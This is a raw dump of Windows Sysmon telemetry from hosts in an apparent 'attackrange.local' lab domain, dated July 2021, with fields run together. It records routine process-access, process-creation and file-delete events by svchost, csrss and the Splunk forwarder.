07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.378{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.018{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB1CDB0AB98E932158ECAB7703B20385,SHA256=F9B15124B768C750520ACDF1F876A3BB593CE254F7E0E4F726C81F44BA56FBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:29.878{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B06E73112E21B146DF4D1D93A19D8D,SHA256=12A615EAAE61290CAD23B445953304A6F5414055DDD0DE256E004B19591BECF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:29.142{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35294E4C234E019B36F4973CC56A4234,SHA256=C9CE4515B41EE1503F7253C22854188F8D96E1459159F5F58D5A8B5B830341B5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:29.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADE6DE138ADE1BCFB9101614764CC1F6,SHA256=68FEA7FD45901EA5627BE112C76D58C92D4E3C8B35006EC5A846F1FFC0DBEDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.893{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EB2F9D78452CE1AF5FF46AC24D7DA0,SHA256=28E29A0658D4C97A0869663719E3D8A83AF8A687034DC56EF6D7B514BF656233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:30.159{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CFDD77801488824C6A28CCAA23DD318,SHA256=65C49A81DEF49F51A745662069C6A7F0FF9E47B15E205C422ECA37A24DADE602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.081{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DF6088D9776FD56B0D55B9F0DF70090C,SHA256=CE7871CE32734B3CB43CD91B6ED5DA383F4CA21229848F9AF88101BEFEDDCC3F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:31.925{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DE1624049B7E3FD2EB098669A747B75,SHA256=5DAE369576CB029EEF79C493F0B84467EF495171DB4AFC4474604DDFF830DF87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.725{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 